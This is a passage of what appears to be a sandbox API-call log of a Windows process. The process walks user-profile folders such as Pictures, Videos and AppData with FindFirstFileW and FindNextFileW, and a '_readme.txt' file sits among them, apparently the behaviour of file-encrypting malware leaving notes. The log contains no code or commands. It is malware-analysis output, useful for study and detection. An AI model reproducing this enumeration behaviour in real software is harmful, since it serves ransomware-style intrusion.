lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3f0 | out: hHeap=0x6a0000) returned 1 [0175.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82850 | out: hHeap=0x6a0000) returned 1 [0175.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f4c8 | out: hHeap=0x6a0000) returned 1 [0175.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c40050 | out: hHeap=0x6a0000) returned 1 [0175.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f4c8 [0175.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f480 | out: hHeap=0x6a0000) returned 1 [0175.501] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x98f436d0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x98f436d0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0175.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f480 [0175.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3f0 [0175.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f480 | out: hHeap=0x6a0000) returned 1 [0175.501] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d70450, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d70450, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d70450, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0175.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f480 [0175.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0175.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f480 | out: hHeap=0x6a0000) returned 1 [0175.502] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d70450, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d70450, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d70450, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0175.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f480 [0175.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f438 [0175.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f480 | out: hHeap=0x6a0000) returned 1 [0175.503] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8847c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0175.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f480 [0175.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f360 [0175.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f480 | out: hHeap=0x6a0000) returned 1 [0175.504] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e82f090, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0175.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f480 [0175.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f318 [0175.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f480 | out: hHeap=0x6a0000) returned 1 [0175.505] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d965b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d965b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d965b0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0175.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f480 [0175.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x310) returned 0x2d2feb8 [0175.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d307a8 [0175.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82850 [0175.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30760 [0175.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30718 [0175.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d306d0 [0175.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30a30 [0175.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30a78 [0175.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30ac0 [0175.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30b08 [0175.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30b50 [0175.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827a0 [0175.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30b98 [0175.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30be0 [0175.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30c28 [0175.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30c70 [0175.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30cb8 [0175.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30d00 [0175.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30d48 [0175.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0175.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0175.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30688 | out: hHeap=0x6a0000) returned 1 [0175.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d307f0 | out: hHeap=0x6a0000) returned 1 [0175.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30838 | out: hHeap=0x6a0000) returned 1 [0175.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30880 | out: hHeap=0x6a0000) returned 1 [0175.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d308c8 | out: hHeap=0x6a0000) returned 1 [0175.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30910 | out: hHeap=0x6a0000) returned 1 [0175.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30958 | out: hHeap=0x6a0000) returned 1 [0175.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0175.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d309a0 | out: hHeap=0x6a0000) returned 1 [0175.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0175.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d309e8 | out: hHeap=0x6a0000) returned 1 [0175.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f4c8 | out: hHeap=0x6a0000) returned 1 [0175.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3f0 | out: hHeap=0x6a0000) returned 1 [0175.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0175.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f438 | out: hHeap=0x6a0000) returned 1 [0175.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f360 | out: hHeap=0x6a0000) returned 1 [0175.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f318 | out: hHeap=0x6a0000) returned 1 [0175.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0175.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f318 [0175.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f480 | out: hHeap=0x6a0000) returned 1 [0175.512] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d965b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d965b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d965b0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0175.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f480 [0175.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f360 [0175.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f480 | out: hHeap=0x6a0000) returned 1 [0175.513] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d965b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d965b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d965b0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0175.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f480 [0175.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f438 [0175.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f480 | out: hHeap=0x6a0000) returned 1 [0175.514] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794831d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x99001db0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x99001db0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0175.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f480 [0175.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0175.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f480 | out: hHeap=0x6a0000) returned 1 [0175.514] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe140cf30, ftCreationTime.dwHighDateTime=0x1d8a8ba, ftLastAccessTime.dwLowDateTime=0xe140cf30, ftLastAccessTime.dwHighDateTime=0x1d8a8ba, ftLastWriteTime.dwLowDateTime=0xe140cf30, ftLastWriteTime.dwHighDateTime=0x1d8a8ba, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0175.515] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe140cf30, ftCreationTime.dwHighDateTime=0x1d8a8ba, ftLastAccessTime.dwLowDateTime=0xe140cf30, ftLastAccessTime.dwHighDateTime=0x1d8a8ba, ftLastWriteTime.dwLowDateTime=0xe140cf30, ftLastWriteTime.dwHighDateTime=0x1d8a8ba, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0175.515] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0175.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d276f8 | out: hHeap=0x6a0000) returned 1 [0175.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0175.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0175.515] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0175.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0175.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0175.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0175.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0175.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0175.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0175.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ab8 | out: hHeap=0x6a0000) returned 1 [0175.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277e8 | out: hHeap=0x6a0000) returned 1 [0175.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278d8 | out: hHeap=0x6a0000) returned 1 [0175.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0175.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27cc0 | out: hHeap=0x6a0000) returned 1 [0175.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27c98 | out: hHeap=0x6a0000) returned 1 [0175.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27c70 | out: hHeap=0x6a0000) returned 1 [0175.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27c48 | out: hHeap=0x6a0000) returned 1 [0175.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27c20 | out: hHeap=0x6a0000) returned 1 [0175.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27bf8 | out: hHeap=0x6a0000) returned 1 [0175.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27bd0 | out: hHeap=0x6a0000) returned 1 [0175.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d279a0 | out: hHeap=0x6a0000) returned 1 [0175.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27950 | out: hHeap=0x6a0000) returned 1 [0175.521] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.521] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.521] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.522] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\") returned="AppData\\" [0175.522] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d28008 [0175.522] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0175.522] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0175.522] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0175.522] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0175.522] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.522] PathFindFileNameW (pszPath="") returned="" [0175.522] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.522] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0175.522] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.522] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xa1a18c20, ftLastAccessTime.dwHighDateTime=0x1d8a8ba, ftLastWriteTime.dwLowDateTime=0xa1a18c20, ftLastWriteTime.dwHighDateTime=0x1d8a8ba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0175.522] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a08 [0175.523] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0175.523] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27fe0 [0175.523] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0175.523] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796723b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x23a1d229, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0175.523] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a08 [0175.523] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0175.523] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x38) returned 0x2cbfa50 [0175.523] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0175.523] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9955cf30, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9955cf30, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0175.523] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a08 [0175.523] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0175.523] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x54) returned 0x2bf9bd8 [0175.523] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82ab8 [0175.523] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b10 [0175.523] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9955cf30, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9955cf30, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0175.523] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0175.524] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.524] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 